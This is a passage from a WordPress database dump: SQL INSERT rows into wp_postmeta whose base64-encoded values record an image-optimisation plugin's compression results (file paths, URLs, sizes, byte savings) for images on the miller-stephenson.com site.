NlwvMDhcL1VyZXRoYW5lLU1pc3NsZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTY2NSwiaWQiOjYxNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1NaXNzbGUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1NaXNzbGUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1NaXNzbGUtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU2NjgsImlkIjo2MTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NjcxLCJpZCI6NjE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NjczLCJpZCI6NjE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1Njc2LCJpZCI6NjE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1Njc4LCJpZCI6NjE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NjgxLCJpZCI6NjE0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtTWlzc2xlLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1Njg0LCJpZCI6NjE0fV0='); 
INSERT INTO `wp_postmeta` VALUES (30137, 613, 'wpfc_optimisation_reduction', '10660'); 
INSERT INTO `wp_postmeta` VALUES (30138, 613, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtQ29uZm9ybWFsLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtQ29uZm9ybWFsLmpwZyIsIndpZHRoIjo1NTk0LCJoZWlnaHQiOjM3MjksIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1ODU2ODgsImlkIjoiNjEzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjUyNiwidGltZSI6MTQ4MzU4NTY5MiwiaWQiOjYxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjkxNywidGltZSI6MTQ4MzU4NTY5NiwiaWQiOjYxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjkyMSwidGltZSI6MTQ4MzU4NTcwMCwiaWQiOjYxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtQ29uZm9ybWFsLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MjcxNywidGltZSI6MTQ4MzU4NTcwNSwiaWQiOjYxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUxOSwidGltZSI6MTQ4MzU4NTcwOCwiaWQiOjYxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQyOSwidGltZSI6MTQ4MzU4NTcxMSwiaWQiOjYxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjQ0MiwidGltZSI6MTQ4MzU4NTcxNSwiaWQiOjYxM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjgwOSwidGltZSI6MTQ4MzU4NTcxOSwiaWQiOjYxM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1VyZXRoYW5lLUNvbmZvcm1hbC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1VyZXRoYW5lLUNvbmZvcm1hbC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1VyZXRoYW5lLUNvbmZvcm1hbC0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDczLCJ0aW1lIjoxNDgzNTg1NzIyLCJpZCI6NjEzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtQ29uZm9ybWFsLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtQ29uZm9ybWFsLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtQ29uZm9ybWFsLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo1NTIsInRpbWUiOjE0ODM1ODU3MjUsImlkIjo2MTN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9VcmV0aGFuZS1Db25mb3JtYWwtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY3NywidGltZSI6MTQ4MzU4NTcyOSwiaWQiOjYxM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1VyZXRoYW5lLUNvbmZvcm1hbC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1VyZXRoYW5lLUNvbmZvcm1hbC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1VyZXRoYW5lLUNvbmZvcm1hbC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6NzUwLCJ0aW1lIjoxNDgzNTg1NzMyLCJpZCI6NjEzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtQ29uZm9ybWFsLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVXJldGhhbmUtQ29uZm9ybWFsLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVXJldGhhbmUtQ29uZm9ybWFsLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo5MjgsInRpbWUiOjE0ODM1ODU3MzYsImlkIjo2MTN9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30139, 607, 'wpfc_optimisation_reduction', '1487'); 
INSERT INTO `wp_postmeta` VALUES (30140, 607, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZmx1b3JvX2J3LWUxNDcxNjIxMTk4OTU1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZmx1b3JvX2J3LWUxNDcxNjIxMTk4OTU1LmpwZyIsIndpZHRoIjoyNzUsImhlaWdodCI6MTE0LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZmx1b3JvX2J3LWUxNDcxNjIxMTk4OTU1LmpwZyIsInJlZHVjdGlvbiI6OTQ1LCJ0aW1lIjoxNDgzNTg1NzQzLCJpZCI6IjYwNyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZmx1b3JvX2J3LWUxNDcxNjIxMTk4OTU1LTI1MHgxMTQuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoxMTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZmx1b3JvX2J3LWUxNDcxNjIxMTk4OTU1LTI1MHgxMTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZmx1b3JvX2J3LWUxNDcxNjIxMTk4OTU1LTI1MHgxMTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg1NzQ1LCJpZCI6NjA3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2ZsdW9yb19idy1lMTQ3MTYyMTE5ODk1NS0yMDB4MTE0LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MTE0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2ZsdW9yb19idy1lMTQ3MTYyMTE5ODk1NS0yMDB4MTE0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2ZsdW9yb19idy1lMTQ3MTYyMTE5ODk1NS0yMDB4MTE0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NTc0NywiaWQiOjYwN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9mbHVvcm9fYnctZTE0NzE2MjExOTg5NTUtMjI1eDExNC5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjExNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9mbHVvcm9fYnctZTE0NzE2MjExOTg5NTUtMjI1eDExNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9mbHVvcm9fYnctZTE0NzE2MjExOTg5NTUtMjI1eDExNC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODU3NDksImlkIjo2MDd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9mbHVvcm9fYnctZTE0NzE2MjExOTg5NTUtMTE0eDExNC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9mbHVvcm9fYnctZTE0NzE2MjExOTg5NTUtMTE0eDExNC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjExNCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9mbHVvcm9fYnctZTE0NzE2MjExOTg5NTUtMTE0eDExNC5qcGciLCJyZWR1Y3Rpb24iOjQ5MiwidGltZSI6MTQ4MzU4NTc1MSwiaWQiOjYwN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2ZsdW9yb19idy1lMTQ3MTYyMTE5ODk1NS0yNDd4MTE0LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2ZsdW9yb19idy1lMTQ3MTYyMTE5ODk1NS0yNDd4MTE0LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2